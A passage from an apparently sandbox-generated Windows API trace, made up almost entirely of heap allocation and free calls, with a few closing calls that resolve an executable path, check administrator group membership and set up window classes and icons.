Size=0xc) returned 0xbf36a8 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2) returned 0xbf3140 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf36f0 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3708 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3150 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3140 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3720 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3738 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36f0 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf36f0 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1c) returned 0xbe6610 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3750 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6660 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3140 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe6610 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3768 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3780 [0256.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3750 | out: hHeap=0xbc0000) returned 1 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3750 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3798 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37b0 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37c8 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37e0 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xac) returned 0xbf3a48 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37f8 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3810 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3828 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3840 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3858 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3870 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3888 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf38a0 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf38b8 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf38d0 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf38e8 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3900 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3918 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3b18 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3b30 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3b48 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3b60 [0256.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3b78 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3b90 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3ba8 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3bc0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3bd8 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3bf0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3c08 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3c20 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3c38 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3c50 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3c68 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3c80 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3c98 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3cb0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3cc8 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3ce0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3cf8 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3d10 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3d28 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3d40 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3d58 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3d70 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3d88 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3da0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3db8 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3dd0 [0256.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3de8 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3e00 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3e18 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3e30 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3e48 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3e60 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3e78 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3e90 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3ea8 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3ec0 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3ed8 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3f18 [0256.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3f30 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea6f0 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea7b0 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea798 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea780 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea810 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea7c8 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea7e0 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea870 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea828 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea840 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea8d0 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea8b8 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea888 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea918 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea900 | out: hHeap=0xbc0000) returned 1 [0256.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea8e8 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea930 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea948 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea9a8 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea960 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea978 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea9c0 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea9d8 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa38 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea9f0 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa08 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa50 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa68 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3558 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa80 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa98 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3570 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3588 | out: hHeap=0xbc0000) returned 1 [0256.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35d0 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35b8 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35a0 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35e8 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3600 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3660 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3618 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3630 | out: hHeap=0xbc0000) returned 1 [0256.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3678 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3690 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36d8 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36c0 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36a8 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3738 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3720 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36f0 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3780 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3768 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3750 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3798 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37b0 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37c8 | out: hHeap=0xbc0000) returned 1 [0256.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37e0 | out: hHeap=0xbc0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37e0 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf37c8 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3160 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37c8 | out: hHeap=0xbc0000) returned 1 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3160 | out: hHeap=0xbc0000) returned 1 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37e0 | out: hHeap=0xbc0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37e0 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x14) returned 0xbea628 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf37c8 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6610 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3160 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea628 | out: hHeap=0xbc0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37b0 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3798 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37c8 | out: hHeap=0xbc0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37c8 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6688 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3750 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3768 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3780 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf36f0 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37e0 | out: hHeap=0xbc0000) returned 1 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3798 | out: hHeap=0xbc0000) returned 1 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37b0 | out: hHeap=0xbc0000) returned 1 [0256.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37c8 | out: hHeap=0xbc0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x6) returned 0xbf3170 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf37c8 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3180 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37c8 | out: hHeap=0xbc0000) returned 1 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3170 | out: hHeap=0xbc0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37c8 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37b0 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3798 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf37e0 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3170 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf37b0 | out: hHeap=0xbc0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf37b0 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3720 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3798 | out: hHeap=0xbc0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3798 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3180 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3738 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf36a8 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3190 [0256.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf36c0 [0256.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf36d8 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3738 | out: hHeap=0xbc0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa) returned 0xbf3738 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3690 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3180 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3690 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3738 | out: hHeap=0xbc0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3738 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xe) returned 0xbf3690 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3678 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3180 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3678 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3690 | out: hHeap=0xbc0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3690 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x12) returned 0xbea628 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe66b0 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3180 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe66b0 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea628 | out: hHeap=0xbc0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3678 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3630 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3618 [0256.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3660 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3600 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35e8 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2) returned 0xbf3180 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf35a0 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf35b8 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf31a0 [0256.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3180 | out: hHeap=0xbc0000) returned 1 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35d0 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3588 [0256.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35a0 | out: hHeap=0xbc0000) returned 1 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35a0 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3570 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x3c) returned 0xbd22d0 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3558 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3f48 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3f60 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3f78 [0256.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3f90 [0256.546] IUnknown:Release (This=0xbe6520) returned 0x0 [0256.546] FreeLibrary (hLibModule=0x290000) returned 1 [0256.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9250 | out: hHeap=0xbc0000) returned 1 [0256.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9238 | out: hHeap=0xbc0000) returned 1 [0256.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3940 | out: hHeap=0xbc0000) returned 1 [0256.547] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7dfea0, lpFilePart=0x7ffec0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x7ffec0*="testers.exe") returned 0x2f [0256.547] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xbe54c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x7dfe8c | out: IsMember=0x7dfe8c) returned 1 [0256.549] GetSysColorBrush (nIndex=15) returned 0x1100059 [0256.549] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0256.549] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x11016f [0256.549] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x13014d [0256.550] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0xc0181 [0256.551] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xa017f [0256.551] RegisterClassExW (param_1=0x7dfe5c) returned 0xc123 [0256.551] GetSysColorBrush (nIndex=15) returned 0x1100059 [0256.552] RegisterClassExW (param_1=0x7dfe00) returned 0xc12c [0256.552] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0256.552] InitCommonControlsEx (picce=0x7dfe30) returned 1 [0256.552] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xbfcbd0 [0256.553] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x60179 [0256.553] 